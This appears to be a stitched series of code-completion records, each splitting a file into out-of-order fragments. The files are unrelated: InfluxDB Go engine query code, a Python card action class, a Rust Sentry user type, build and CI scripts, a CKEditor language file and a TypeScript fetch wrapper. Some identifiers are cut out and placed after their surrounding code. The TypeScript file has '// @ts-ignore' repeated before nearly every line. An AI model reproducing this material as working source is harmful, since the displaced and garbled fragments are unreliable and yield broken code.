limit := e.Cache.MaxSize()
defer func() {
e.Cache.SetMaxSize(limit)
}()
// Disable the max size during loading
e.Cache.SetMaxSize(0)
loader := NewCacheLoader(files)
loader.WithLogger(e.logger)
if err := loader.Load(e.Cache); err != nil {
return err
}
e.traceLogger.Info("Reloaded WAL cache",
zap.String("path", e.WAL.Path()), zap.Duration("duration", time.Since(now)))
return nil
}
// cleanup removes all temp files and dirs that exist on disk. This is should only be run at startup to avoid
// removing tmp files that are still in use.
func (e *Engine) cleanup() error {
allfiles, err := ioutil.ReadDir(e.path)
if os.IsNotExist(err) {
return nil
} else if err != nil {
return err
}
ext := fmt.Sprintf(".%s", TmpTSMFileExtension)
for _, f := range allfiles {
// Check to see if there are any `.tmp` directories that were left over from failed shard snapshots
if f.IsDir() && strings.HasSuffix(f.Name(), ext) {
if err := os.RemoveAll(filepath.Join(e.path, f.Name())); err != nil {
return fmt.Errorf("error removing tmp snapshot directory %q: %s", f.Name(), err)
}
}
}
return e.cleanupTempTSMFiles()
}
func (e *Engine) cleanupTempTSMFiles() error {
files, err := filepath.Glob(filepath.Join(e.path, fmt.Sprintf("*.%s", CompactionTempExtension)))
if err != nil {
return fmt.Errorf("error getting compaction temp files: %s", err.Error())
}
for _, f := range files {
if err := os.Remove(f); err != nil {
return fmt.Errorf("error removing temp compaction files: %v", err)
}
}
return nil
}
// KeyCursor returns a KeyCursor for the given key starting at time t.
func (e *Engine) KeyCursor(ctx context.Context, key []byte, t int64, ascending bool) *KeyCursor {
return e.FileStore.KeyCursor(ctx, key, t, ascending)
}
// CreateIterator returns an iterator for the measurement based on opt.
func (e *Engine) CreateIterator(ctx context.Context, measurement string, opt query.IteratorOptions) (query.Iterator, error) {
if span := tracing.SpanFromContext(ctx); span != nil {
labels := []string{"shard_id", strconv.Itoa(int(e.id)), "measurement", measurement}
if opt.Condition != nil {
labels = append(labels, "cond", opt.Condition.String())
}
span = span.StartSpan("create_iterator")
span.SetLabels(labels...)
ctx = tracing.NewContextWithSpan(ctx, span)
group := metrics.NewGroup(tsmGroup)
ctx = metrics.NewContextWithGroup(ctx, group)
start := time.Now()
defer group.GetTimer(planningTimer).UpdateSince(start)
}
if call, ok := opt.Expr.(*influxql.Call); ok {
if opt.Interval.IsZero() {
if call.Name == "first" || call.Name == "last" {
refOpt := opt
refOpt.Limit = 1
refOpt.Ascending = call.Name == "first"
refOpt.Ordered = true
refOpt.Expr = call.Args[0]
itrs, err := e.createVarRefIterator(ctx, measurement, refOpt)
if err != nil {
return nil, err
}
return newMergeFinalizerIterator(ctx, itrs, opt, e.logger)
}
}
inputs, err := e.createCallIterator(ctx, measurement, call, opt)
if err != nil {
return nil, err
} else if len(inputs) == 0 {
return nil, nil
}
return newMergeFinalizerIterator(ctx, inputs, opt, e.logger)
}
itrs, err := e.createVarRefIterator(ctx, measurement, opt)
if err != nil {
return nil, err
}
return newMergeFinalizerIterator(ctx, itrs, opt, e.logger)
}
type indexTagSets interface {
TagSets(name []byte, options query.IteratorOptions) ([]*query.TagSet, error)
}
func (e *Engine) createCallIterator(ctx context.Context, measurement string, call *influxql.Call, opt query.IteratorOptions) ([]query.Iterator, error) {
ref, _ := call.Args[0].(*influxql.VarRef)
if exists, err := e.index.MeasurementExists([]byte(measurement)); err != nil {
return nil, err
} else if !exists {
return nil, nil
}
// Determine tagsets for this measurement based on dimensions and filters.
var (
tagSets []*query.TagSet
err error
)
if e.index.Type() == tsdb.InmemIndexName {
ts := e.index.(indexTagSets)
tagSets, err = ts.TagSets([]byte(measurement), opt)
} else {
indexSet := tsdb.IndexSet{Indexes: []tsdb.Index{e.index}, SeriesFile: e.sfile}
tagSets, err = indexSet.TagSets(e.sfile, []byte(measurement), opt)
}
if err != nil {
return nil, err
}
// Reverse the tag sets if we are ordering by descending.
if !opt.Ascending {
for _, t := range tagSets {
t.Reverse()
}
}
// Calculate tag sets and apply SLIMIT/SOFFSET.
tagSets = query.LimitTagSets(tagSets, opt.SLimit, opt.SOffset)
itrs := make([]query.Iterator, 0, len(tagSets))
if err := func() error {
for _, t := range tagSets {
// Abort if the query was killed
select {
case <-opt.InterruptCh:
query.Iterators(itrs).Close()
return query.ErrQueryInterrupted
default:
}
inputs, err := e.createTagSetIterators(ctx, ref, measurement, t, opt)
if err != nil {
return err
} else if len(inputs) == 0 {
continue
}
// Wrap each series in a call iterator.
for i, input := range inputs {
if opt.InterruptCh != nil {
input = query.NewInterruptIterator(input, opt.InterruptCh)
}
itr, err := query.NewCallIterator(input, opt)
if err != nil {
query.Iterators(inputs).Close()
return err
}
inputs[i] = itr
}
itr := query.NewParallelMergeIterator(inputs, opt, runtime.GOMAXPROCS(0))
itrs = append(itrs, itr)
}
return nil
}(); err != nil {
query.Iterators(itrs).Close()
return nil, err
}
return itrs, nil
}
// createVarRefIterator creates an iterator for a variable reference.
func (e *Engine) createVarRefIterator(ctx context.Context, measurement string, opt query.IteratorOptions) ([]query.Iterator, error) {
ref, _ := opt.Expr.(*influxql.VarRef)
if exists, err := e.index.MeasurementExists([]byte(measurement)); err != nil {
return nil, err
} else if !exists {
return nil, nil
}
var (
tagSets []*query.TagSet
err error
)
if e.index.Type() == tsdb.InmemIndexName {
ts := e.index.(indexTagSets)
tagSets, err = ts.TagSets([]byte(measurement), opt)
} else {
indexSet := tsdb.IndexSet{Indexes: []tsdb.Index{e.index}, SeriesFile: e.sfile}
tagSets, err = indexSet.TagSets(e.sfile, []byte(measurement), opt)
}
if err != nil {
return nil, err
}
// Reverse the tag sets if we are ordering by descending.
if !opt.Ascending {
for _, t := range tagSets {
t.Reverse()
}
}
// Calculate tag sets and apply SLIMIT/SOFFSET.
tagSets = query.LimitTagSets(tagSets, opt.SLimit, opt.SOffset)
itrs := make([]query.Iterator, 0, len(tagSets))
if err := func() error {
for _, t := range tagSets {
inputs, err := e.createTagSetIterators(ctx, ref, measurement, t, opt)
if err != nil {
return err
} else if len(inputs) == 0 {
continue
}
// If we have a LIMIT or OFFSET and the grouping of the outer query
// is different than the current grouping, we need to perform the
// limit on each of the individual series keys instead to improve
// performance.
if (opt.Limit > 0 || opt.Offset > 0) && len(opt.Dimensions) != len(opt.GroupBy) {
for i, input := range inputs {
inputs[i] = newLimitIterator(input, opt)
}
}
itr, err := query.Iterators(inputs).Merge(opt)
if err != nil {
query.Iterators(inputs).Close()
return err
}
// Apply a limit on the merged iterator.
if opt.Limit > 0 || opt.Offset > 0 {
if len(opt.Dimensions) == len(opt.GroupBy) {
// When the final dimensions and the current grouping are
// the same, we will only produce one series so we can use
// the faster limit iterator.
itr = newLimitIterator(itr, opt)
} else {
// When the dimensions are different than the current
// grouping, we need to account for the possibility there
// will be multiple series. The limit iterator in the
// influxql package handles that scenario.
itr = query.NewLimitIterator(itr, opt)
}
}
itrs = append(itrs, itr)
}
return nil
}(); err != nil {
query.Iterators(itrs).Close()
return nil, err
}
return itrs, nil
}
// createTagSetIterators creates a set of iterators for a tagset.
func (e *Engine) createTagSetIterators(ctx context.Context, ref *influxql.VarRef, name string, t *query.TagSet, opt query.IteratorOptions) ([]query.Iterator, error) {
// Set parallelism by number of logical cpus.
parallelism := runtime.GOMAXPROCS(0)
if parallelism > len(t.SeriesKeys) {
parallelism = len(t.SeriesKeys)
}
// Create series key groupings w/ return error.
groups := make([]struct {
keys []string
filters []influxql.Expr
itrs []query.Iterator
err error
}, parallelism)
// Group series keys.
n := len(t.SeriesKeys) / parallelism
for i := 0; i < parallelism; i++ {
group := &groups[i]
if i < parallelism-1 {
group.keys = t.SeriesKeys[i*n : (i+1)*n]
group.filters = t.Filters[i*n : (i+1)*n]
} else {
group.keys = t.SeriesKeys[i*n:]
group.filters = t.Filters[i*n:]
}
}
// Read series groups in parallel.
var wg sync.WaitGroup
for i := range groups {
wg.Add(1)
go func(i int) {
defer wg.Done()
groups[i].itrs, groups[i].err = e.createTagSetGroupIterators(ctx, ref, name, groups[i].keys, t, groups[i].filters, opt)
}(i)
}
wg.Wait()
// Determine total number of iterators so we can allocate only once.
var itrN int
for _, group := range groups {
itrN += len(group.itrs)
}
// Combine all iterators together and check for errors.
var err error
itrs := make([]query.Iterator, 0, itrN)
for _, group := range groups {
if group.err != nil {
err = group.err
}
itrs = append(itrs, group.itrs...)
}
// If an error occurred, make sure we close all created iterators.
if err != nil {
query.Iterators(itrs).Close()
return nil, err
}
return itrs, nil
}
// createTagSetGroupIterators creates a set of iterators for a subset of a tagset's series.
func (e *Engine) createTagSetGroupIterators(ctx context.Context, ref *influxql.VarRef, name string, seriesKeys []string, t *query.TagSet, filters []influxql.Expr, opt query.IteratorOptions) ([]query.Iterator, error) {
itrs := make([]query.Iterator, 0, len(seriesKeys))
for i, seriesKey := range seriesKeys {
var conditionFields []influxql.VarRef
if filters[i] != nil {
// Retrieve non-time fields from this series filter and filter out tags.
conditionFields = influxql.ExprNames(filters[i])
}
itr, err := e.createVarRefSeriesIterator(ctx, ref, name, seriesKey, t, filters[i], conditionFields, opt)
if err != nil {
return itrs, err
} else if itr == nil {
continue
}
itrs = append(itrs, itr)
// Abort if the query was killed
select {
case <-opt.InterruptCh:
query.Iterators(itrs).Close()
return nil, query.ErrQueryInterrupted
default:
}
// Enforce series limit at creation time.
if opt.MaxSeriesN > 0 && len(itrs) > opt.MaxSeriesN {
query.Iterators(itrs).Close()
return nil, fmt.Errorf("max-select-series limit exceeded: (%d/%d)", len(itrs), opt.MaxSeriesN)
}
}
return itrs, nil
}
// createVarRefSeriesIterator creates an iterator for a variable reference for a series.
func (e *Engine) createVarRefSeriesIterator(ctx context.Context, ref *influxql.VarRef, name string, seriesKey string, t *query.TagSet, filter influxql.Expr, conditionFields []influxql.VarRef, opt query.IteratorOptions) (query.Iterator, error) {
_, tfs := models.ParseKey([]byte(seriesKey))
tags := query.NewTags(tfs.Map())
// Create options specific for this series.
itrOpt := opt
itrOpt.Condition = filter
var curCounter, auxCounter, condCounter *metrics.Counter
if col := metrics.GroupFromContext(ctx); col != nil {
curCounter = col.GetCounter(numberOfRefCursorsCounter)
auxCounter = col.GetCounter(numberOfAuxCursorsCounter)
condCounter = col.GetCounter(numberOfCondCursorsCounter)
}
// Build main cursor.
var cur cursor
if ref != nil {
cur = e.buildCursor(ctx, name, seriesKey, tfs, ref, opt)
// If the field doesn't exist then don't build an iterator.
if cur == nil {
return nil, nil
}
if curCounter != nil {
curCounter.Add(1)
}
}
// Build auxiliary cursors.
// Tag values should be returned if the field doesn't exist.
var aux []cursorAt
if len(opt.Aux) > 0 {
aux = make([]cursorAt, len(opt.Aux))
for i, ref := range opt.Aux {
// Create cursor from field if a tag wasn't requested.
if ref.Type != influxql.Tag {
cur := e.buildCursor(ctx, name, seriesKey, tfs, &ref, opt)
if cur != nil {
if auxCounter != nil {
auxCounter.Add(1)
}
aux[i] = newBufCursor(cur, opt.Ascending)
continue
}
// If a field was requested, use a nil cursor of the requested type.
switch ref.Type {
case influxql.Float, influxql.AnyField:
aux[i] = nilFloatLiteralValueCursor
continue
case influxql.Integer:
aux[i] = nilIntegerLiteralValueCursor
continue
case influxql.Unsigned:
aux[i] = nilUnsignedLiteralValueCursor
continue
case influxql.String:
aux[i] = nilStringLiteralValueCursor
continue
case influxql.Boolean:
aux[i] = nilBooleanLiteralValueCursor
continue
}
}
// If field doesn't exist, use the tag value.
if v := tags.Value(ref.Val); v == "" {
// However, if the tag value is blank then return a null.
aux[i] = nilStringLiteralValueCursor
} else {
aux[i] = &literalValueCursor{value: v}
}
}
}
// Remove _tagKey condition field.
// We can't seach on it because we can't join it to _tagValue based on time.
if varRefSliceContains(conditionFields, "_tagKey") {
conditionFields = varRefSliceRemove(conditionFields, "_tagKey")
// Remove _tagKey conditional references from iterator.
itrOpt.Condition = influxql.RewriteExpr(influxql.CloneExpr(itrOpt.Condition), func(expr influxql.Expr) influxql.Expr {
switch expr := expr.(type) {
case *influxql.BinaryExpr:
if ref, ok := expr.LHS.(*influxql.VarRef); ok && ref.Val == "_tagKey" {
return &influxql.BooleanLiteral{Val: true}
}
if ref, ok := expr.RHS.(*influxql.VarRef); ok && ref.Val == "_tagKey" {
return &influxql.BooleanLiteral{Val: true}
}
}
return expr
})
}
// Build conditional field cursors.
// If a conditional field doesn't exist then ignore the series.
var conds []cursorAt
if len(conditionFields) > 0 {
conds = make([]cursorAt, len(conditionFields))
for i, ref := range conditionFields {
// Create cursor from field if a tag wasn't requested.
if ref.Type != influxql.Tag {
cur := e.buildCursor(ctx, name, seriesKey, tfs, &ref, opt)
if cur != nil {
if condCounter != nil {
condCounter.Add(1)
}
conds[i] = newBufCursor(cur, opt.Ascending)
continue
}
// If a field was requested, use a nil cursor of the requested type.
switch ref.Type {
case influxql.Float, influxql.AnyField:
conds[i] = nilFloatLiteralValueCursor
continue
case influxql.Integer:
conds[i] = nilIntegerLiteralValueCursor
continue
case influxql.Unsigned:
conds[i] = nilUnsignedLiteralValueCursor
continue
case influxql.String:
conds[i] = nilStringLiteralValueCursor
continue
case influxql.Boolean:
conds[i] = nilBooleanLiteralValueCursor
continue
}
}
// If field doesn't exist, use the tag value.
if v := tags.Value(ref.Val); v == "" {
// However, if the tag value is blank then return a null.
conds[i] = nilStringLiteralValueCursor
} else {
conds[i] = &literalValueCursor{value: v}
}
}
}
condNames := influxql.VarRefs(conditionFields).Strings()
// Limit tags to only the dimensions selected.
dimensions := opt.GetDimensions()
tags = tags.Subset(dimensions)
// If it's only auxiliary fields then it doesn't matter what type of iterator we use.
if ref == nil {
if opt.StripName {
name = ""
}
return newFloatIterator(name, tags, itrOpt, nil, aux, conds, condNames), nil
}
// Remove name if requested.
if opt.StripName {
name = ""
}
switch cur := cur.(type) {
case floatCursor:
return newFloatIterator(name, tags, itrOpt, cur, aux, conds, condNames), nil
case integerCursor:
return newIntegerIterator(name, tags, itrOpt, cur, aux, conds, condNames), nil
case unsignedCursor:
return newUnsignedIterator(name, tags, itrOpt, cur, aux, conds, condNames), nil
case stringCursor:
return newStringIterator(name, tags, itrOpt, cur, aux, conds, condNames), nil
case booleanCursor:
return newBooleanIterator(name, tags, itrOpt, cur, aux, conds, condNames), nil
default:
panic("unreachable")
}
}
// buildCursor creates an untyped cursor for a field.
func (e *Engine) buildCursor(ctx context.Context, measurement, seriesKey string, tags models.Tags, ref *influxql.VarRef, opt query.IteratorOptions) cursor {
// Check if this is a system field cursor.
switch ref.Val {
case "_name":
return &stringSliceCursor{values: []string{measurement}}
case "_tagKey":
return &stringSliceCursor{values: tags.Keys()}
case "_tagValue":
return &stringSliceCursor{values: matchTagValues(tags, opt.Condition)}
case "_seriesKey":
return &stringSliceCursor{values: []string{seriesKey}}
}
// Look up fields for measurement.
mf := e.fieldset.FieldsByString(measurement)
if mf == nil {
return nil
}
// Check for system field for field keys.
if ref.Val == "_fieldKey" {
return &stringSliceCursor{values: mf.FieldKeys()}
}
// Find individual field.
f := mf.Field(ref.Val)
if f == nil {
return nil
}
// Check if we need to perform a cast. Performing a cast in the
// engine (if it is possible) is much more efficient than an automatic cast.
if ref.Type != influxql.Unknown && ref.Type != influxql.AnyField && ref.Type != f.Type {
switch ref.Type {
case influxql.Float:
switch f.Type {
case influxql.Integer:
cur := e.buildIntegerCursor(ctx, measurement, seriesKey, ref.Val, opt)
return &floatCastIntegerCursor{cursor: cur}
case influxql.Unsigned:
cur := e.buildUnsignedCursor(ctx, measurement, seriesKey, ref.Val, opt)
return &floatCastUnsignedCursor{cursor: cur}
}
case influxql.Integer:
switch f.Type {
case influxql.Float:
cur := e.buildFloatCursor(ctx, measurement, seriesKey, ref.Val, opt)
return &integerCastFloatCursor{cursor: cur}
case influxql.Unsigned:
cur := e.buildUnsignedCursor(ctx, measurement, seriesKey, ref.Val, opt)
return &integerCastUnsignedCursor{cursor: cur}
}
case influxql.Unsigned:
switch f.Type {
case influxql.Float:
cur := e.buildFloatCursor(ctx, measurement, seriesKey, ref.Val, opt)
return &unsignedCastFloatCursor{cursor: cur}
case influxql.Integer:
cur := e.buildIntegerCursor(ctx, measurement, seriesKey, ref.Val, opt)
return &unsignedCastIntegerCursor{cursor: cur}
}
}
return nil
}
// Return appropriate cursor based on type.
switch f.Type {
case influxql.Float:
return e.buildFloatCursor(ctx, measurement, seriesKey, ref.Val, opt)
case influxql.Integer:
return e.buildIntegerCursor(ctx, measurement, seriesKey, ref.Val, opt)
case influxql.Unsigned:
return e.buildUnsignedCursor(ctx, measurement, seriesKey, ref.Val, opt)
case influxql.String:
return e.buildStringCursor(ctx, measurement, seriesKey, ref.Val, opt)
case influxql.Boolean:
return e.buildBooleanCursor(ctx, measurement, seriesKey, ref.Val, opt)
default:
panic("unreachable")
}
}
func matchTagValues(tags models.Tags, condition influxql.Expr) []string {
if condition == nil {
return tags.Values()
}
// Populate map with tag values.
data := map[string]interface{}{}
for _, tag := range tags {
data[string(tag.Key)] = string(tag.Value)
}
// Match against each specific tag.
var values []string
for _, tag := range tags {
data["_tagKey"] = string(tag.Key)
if influxql.EvalBool(condition, data) {
values = append(values, string(tag.Value))
}
}
return values
}
// IteratorCost produces the cost of an iterator.
func (e *Engine) IteratorCost(measurement string, opt query.IteratorOptions) (query.IteratorCost, error) {
// Determine if this measurement exists. If it does not, then no shards are
// accessed to begin with.
if exists, err := e.index.MeasurementExists([]byte(measurement)); err != nil {
return query.IteratorCost{}, err
} else if !exists {
return query.IteratorCost{}, nil
}
// Determine all of the tag sets for this query.
indexSet := tsdb.IndexSet{Indexes: []tsdb.Index{e.index}, SeriesFile: e.sfile}
tagSets, err := indexSet.TagSets(e.sfile, []byte(measurement), opt)
if err != nil {
return query.IteratorCost{}, err
}
// Attempt to retrieve the ref from the main expression (if it exists).
var ref *influxql.VarRef
if opt.Expr != nil {
if v, ok := opt.Expr.(*influxql.VarRef); ok {
ref = v
} else if call, ok := opt.Expr.(*influxql.Call); ok {
if len(call.Args) > 0 {
ref, _ = call.Args[0].(*influxql.VarRef)
}
}
}
// Count the number of series concatenated from the tag set.
cost := query.IteratorCost{NumShards: 1}
for _, t := range tagSets {
cost.NumSeries += int64(len(t.SeriesKeys))
for i, key := range t.SeriesKeys {
// Retrieve the cost for the main expression (if it exists).
if ref != nil {
c := e.seriesCost(key, ref.Val, opt.StartTime, opt.EndTime)
cost = cost.Combine(c)
}
// Retrieve the cost for every auxiliary field since these are also
// iterators that we may have to look through.
// We may want to separate these though as we are unlikely to incur
// anywhere close to the full costs of the auxiliary iterators because
// many of the selected values are usually skipped.
for _, ref := range opt.Aux {
c := e.seriesCost(key, ref.Val, opt.StartTime, opt.EndTime)
cost = cost.Combine(c)
}
// Retrieve the expression names in the condition (if there is a condition).
// We will also create cursors for these too.
if t.Filters[i] != nil {
refs := influxql.ExprNames(t.Filters[i])
for _, ref := range refs {
c := e.seriesCost(key, ref.Val, opt.StartTime, opt.EndTime)
cost = cost.Combine(c)
}
}
}
}
return cost, nil
}
// Type returns FieldType for a series. If the series does not
// exist, ErrUnknownFieldType is returned.
func (e *Engine) Type(series []byte) (models.FieldType, error) {
if typ, err := e.Cache.Type(series); err == nil {
return typ, nil
}
typ, err := e.FileStore.Type(series)
if err != nil {
return 0, err
}
switch typ {
case BlockFloat64:
return models.Float, nil
case BlockInteger:
return models.Integer, nil
case BlockUnsigned:
return models.Unsigned, nil
case BlockString:
return models.String, nil
case BlockBoolean:
return models.Boolean, nil
}
return 0, tsdb.ErrUnknownFieldType
}
func (e *Engine) seriesCost(seriesKey, field string, tmin, tmax int64) query.IteratorCost {
key := SeriesFieldKeyBytes(seriesKey, field)
c := e.FileStore.Cost(key, tmin, tmax)
// Retrieve the range of values within the cache.
cacheValues := e.Cache.Values(key)
c.CachedValues = int64(len(cacheValues.Include(tmin, tmax)))
return c
}
// SeriesFieldKey combine a series key and field name for a unique string to be hashed to a numeric ID.
func SeriesFieldKey(seriesKey, field string) string {
return seriesKey + keyFieldSeparator + field
}
func SeriesFieldKeyBytes(seriesKey, field string) []byte {
b := make([]byte, len(seriesKey)+len(keyFieldSeparator)+len(field))
i := copy(b, seriesKey)
i += copy(b[i:], keyFieldSeparatorBytes)
copy(b[i:], field)
return b
}
var (
blockToFieldType = [8]influxql.DataType{
BlockFloat64: influxql.Float,
BlockInteger: influxql.Integer,
BlockBoolean: influxql.Boolean,
BlockString: influxql.String,
BlockUnsigned: influxql.Unsigned,
5: influxql.Unknown,
6: influxql.Unknown,
7: influxql.Unknown,
}
)
func BlockTypeToInfluxQLDataType(typ byte) influxql.DataType { return blockToFieldType[typ&7] }
// SeriesAndFieldFromCompositeKey returns the series key and the field key extracted from the composite key.
func SeriesAndFieldFromCompositeKey(key []byte) ([]byte, []byte) {
sep := bytes.Index(key, keyFieldSeparatorBytes)
if sep == -1 {
// No field???
return key, nil
}
return key[:sep], key[sep+len(keyFieldSeparator):]
}
func varRefSliceContains(a []influxql.VarRef, v string) bool {
for _, ref := range a {
if ref.Val == v {
return true
}
}
return false
}
func varRefSliceRemove(a []influxql.VarRef, v string) []influxql.VarRef {
if !varRefSliceContains(a, v) {
return a
}
other := make([]influxql.VarRef, 0, len(a))
for _, ref := range a {
if ref.Val != v {
other = append(other, ref)
}
}
return other
} | return err
}
} |
action.py | import os
import json
CURRENT_DIR = os.path.dirname(os.path.realpath(__file__))
class Action:
def __init__(self, card, config):
config.pop("action", None)
self.card = card
self.config = config
def env_vars_for_object(self, config, prefix):
env_vars = {}
config.pop("action", None)
config.pop("id", None)
for key, value in config.items():
if value and isinstance(value, dict):
nested_env_vars = self.env_vars_for_object(
value, "{}_{}".format(prefix, key.upper())
)
env_vars = {**env_vars, **nested_env_vars}
else:
env_vars["{}_{}".format(prefix, key.upper())] = value
return env_vars
def env_vars(self):
with open(CURRENT_DIR + "/../../config/config.json", "r") as f:
global_config = json.load(f)
env_vars = self.env_vars_for_object(self.card, "CARD")
env_vars["magic_cards_room"] = global_config["room"]
prefix = self.__class__.__name__.replace("Action", "").upper()
return {**env_vars, **self.env_vars_for_object(self.config, prefix)}
class ChromecastAction(Action):
def __init__(self, card, config, chromecast):
| super().__init__(card, config)
self.chromecast = chromecast |
|
user.rs | //! Sentry user implementation.
use crate::{Object, Value};
use std::{
collections::BTreeMap,
ops::{Deref, DerefMut},
};
/// A Sentry user.
///
/// # Examples
/// ```
/// # use sentry_contrib_native::User;
/// let mut user = User::new();
/// user.insert("id", 1);
/// user.set();
/// ```
#[derive(Clone, Debug, PartialEq, PartialOrd)]
pub struct | (BTreeMap<String, Value>);
impl Default for User {
fn default() -> Self {
Self::new()
}
}
impl Object for User {
fn into_parts(self) -> (sys::Value, BTreeMap<String, Value>) {
(unsafe { sys::value_new_object() }, self.0)
}
}
impl Deref for User {
type Target = BTreeMap<String, Value>;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for User {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
impl User {
/// Creates a new user.
///
/// # Examples
/// ```
/// # use sentry_contrib_native::User;
/// let mut user = User::new();
/// ```
#[must_use]
#[allow(clippy::missing_const_for_fn)]
pub fn new() -> Self {
Self(BTreeMap::new())
}
/// Inserts a key-value pair into the [`User`].
///
/// # Examples
/// ```
/// # use sentry_contrib_native::User;
/// let mut user = User::new();
/// user.insert("id", 1);
/// ```
pub fn insert<S: Into<String>, V: Into<Value>>(&mut self, key: S, value: V) {
self.deref_mut().insert(key.into(), value.into());
}
/// Sets the specified user.
///
/// # Examples
/// ```
/// # use sentry_contrib_native::User;
/// let mut user = User::new();
/// user.insert("id", 1);
/// user.set();
/// ```
pub fn set(self) {
let user = self.into_raw();
unsafe { sys::set_user(user) }
}
}
#[test]
fn user() {
User::new().set();
let mut user = User::new();
user.insert("test", "test");
user.set()
}
| User |
Makefile.py | import os
import shutil
import time
from mklib import Task
from mklib.common import relpath
class foo(Task):
default = True
results = ["foo.txt"]
deps = ["bar.txt"]
def make(self):
src = self.deps[0].path
dst = self.results[0].path
self.log.info("cp %s %s", relpath(src), relpath(dst))
shutil.copy(src, dst)
class bar(Task):
def make(self):
f = open("bar.txt", 'w')
f.write(str(time.time()))
f.close()
class clean(Task):
| def make(self):
for p in ("foo.txt", "bar.txt"):
if os.path.exists(p):
os.remove(p) |
|
docs.py | from typing import List
from ..defines import SupportedPython
from ..step_builder import StepBuilder
def | () -> List[dict]:
return [
# If this test is failing because you may have either:
# (1) Updated the code that is referenced by a literalinclude in the documentation
# (2) Directly modified the inline snapshot of a literalinclude instead of updating
# the underlying code that the literalinclude is pointing to.
# To fix this, run 'make snapshot' in the /docs directory to update the snapshots.
# Be sure to check the diff to make sure the literalincludes are as you expect them."
StepBuilder("docs code snapshots")
.run("pushd docs; make docs_dev_install; make snapshot", "git diff --exit-code")
.on_integration_image(SupportedPython.V3_7)
.build(),
# Make sure the docs site can build end-to-end.
StepBuilder("docs next")
.run(
"pushd docs/next",
"yarn",
"yarn test",
"yarn build-master",
)
.on_integration_image(SupportedPython.V3_7)
.build(),
# TODO: Yuhan to fix
# StepBuilder("docs sphinx json build")
# .run(
# "pip install -e python_modules/automation",
# "pip install -r docs-requirements.txt -qqq",
# "pushd docs; make build",
# "git diff --exit-code",
# )
# .on_integration_image(SupportedPython.V3_7)
# .build(),
]
| docs_steps |
en-gb.js | /*
Copyright (c) 2003-2017, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.md or http://ckeditor.com/license | */
CKEDITOR.plugins.setLang("a11yhelp","en-gb",{title:"Accessibility Instructions",contents:"Help Contents. To close this dialog press ESC.",legend:[{name:"General",items:[{name:"Editor Toolbar",legend:"Press ${toolbarFocus} to navigate to the toolbar. Move to the next and previous toolbar group with TAB and SHIFT+TAB. Move to the next and previous toolbar button with RIGHT ARROW or LEFT ARROW. Press SPACE or ENTER to activate the toolbar button."},{name:"Editor Dialog",legend:"Inside a dialog, press TAB to navigate to the next dialog element, press SHIFT+TAB to move to the previous dialog element, press ENTER to submit the dialog, press ESC to cancel the dialog. When a dialog has multiple tabs, the tab list can be reached either with ALT+F10 or with TAB as part of the dialog tabbing order. With tab list focused, move to the next and previous tab with RIGHT and LEFT ARROW, respectively."},
{name:"Editor Context Menu",legend:"Press ${contextMenu} or APPLICATION KEY to open context-menu. Then move to next menu option with TAB or DOWN ARROW. Move to previous option with SHIFT+TAB or UP ARROW. Press SPACE or ENTER to select the menu option. Open sub-menu of current option with SPACE or ENTER or RIGHT ARROW. Go back to parent menu item with ESC or LEFT ARROW. Close context menu with ESC."},{name:"Editor List Box",legend:"Inside a list-box, move to next list item with TAB OR DOWN ARROW. Move to previous list item with SHIFT+TAB or UP ARROW. Press SPACE or ENTER to select the list option. Press ESC to close the list-box."},
{name:"Editor Element Path Bar",legend:"Press ${elementsPathFocus} to navigate to the elements path bar. Move to next element button with TAB or RIGHT ARROW. Move to previous button with SHIFT+TAB or LEFT ARROW. Press SPACE or ENTER to select the element in editor."}]},{name:"Commands",items:[{name:" Undo command",legend:"Press ${undo}"},{name:" Redo command",legend:"Press ${redo}"},{name:" Bold command",legend:"Press ${bold}"},{name:" Italic command",legend:"Press ${italic}"},{name:" Underline command",
legend:"Press ${underline}"},{name:" Link command",legend:"Press ${link}"},{name:" Toolbar Collapse command",legend:"Press ${toolbarCollapse}"},{name:" Access previous focus space command",legend:"Press ${accessPreviousSpace} to access the closest unreachable focus space before the caret, for example: two adjacent HR elements. Repeat the key combination to reach distant focus spaces."},{name:" Access next focus space command",legend:"Press ${accessNextSpace} to access the closest unreachable focus space after the caret, for example: two adjacent HR elements. Repeat the key combination to reach distant focus spaces."},
{name:" Accessibility Help",legend:"Press ${a11yHelp}"},{name:" Paste as plain text",legend:"Press ${pastetext}",legendEdge:"Press ${pastetext}, followed by ${paste}"}]}],tab:"Tab",pause:"Pause",capslock:"Caps Lock",escape:"Escape",pageUp:"Page Up",pageDown:"Page Down",leftArrow:"Left Arrow",upArrow:"Up Arrow",rightArrow:"Right Arrow",downArrow:"Down Arrow",insert:"Insert",leftWindowKey:"Left Windows key",rightWindowKey:"Right Windows key",selectKey:"Select key",numpad0:"Numpad 0",numpad1:"Numpad 1",
numpad2:"Numpad 2",numpad3:"Numpad 3",numpad4:"Numpad 4",numpad5:"Numpad 5",numpad6:"Numpad 6",numpad7:"Numpad 7",numpad8:"Numpad 8",numpad9:"Numpad 9",multiply:"Multiply",add:"Add",subtract:"Subtract",decimalPoint:"Decimal Point",divide:"Divide",f1:"F1",f2:"F2",f3:"F3",f4:"F4",f5:"F5",f6:"F6",f7:"F7",f8:"F8",f9:"F9",f10:"F10",f11:"F11",f12:"F12",numLock:"Num Lock",scrollLock:"Scroll Lock",semiColon:"Semicolon",equalSign:"Equal Sign",comma:"Comma",dash:"Dash",period:"Period",forwardSlash:"Forward Slash",
graveAccent:"Grave Accent",openBracket:"Open Bracket",backSlash:"Backslash",closeBracket:"Close Bracket",singleQuote:"Single Quote"}); | |
fetch-cookie.ts | // @ts-ignore
import createDebug from 'debug';
// @ts-ignore
import { CookieJar } from 'tough-cookie';
// @ts-ignore
// @ts-ignore
import {
// @ts-ignore
fetch,
// @ts-ignore
// @ts-ignore
RequestInfo,
// @ts-ignore
RequestInit,
// @ts-ignore
Response
// @ts-ignore
} from './fetch';
// @ts-ignore
// @ts-ignore
export type Headers = Record<string, string>;
// @ts-ignore
// @ts-ignore
export type FetchWrapper = (
// @ts-ignore
url: RequestInfo,
// @ts-ignore
options?: RequestInit
// @ts-ignore
) => Promise<Response>;
// @ts-ignore
// @ts-ignore
export {
// @ts-ignore
CookieJar,
// @ts-ignore
RequestInfo,
// @ts-ignore
RequestInit,
// @ts-ignore
Response
// @ts-ignore
};
// @ts-ignore
// @ts-ignore
const debug = createDebug('vk-io:util:fetch-cookie');
// @ts-ignore
// @ts-ignore
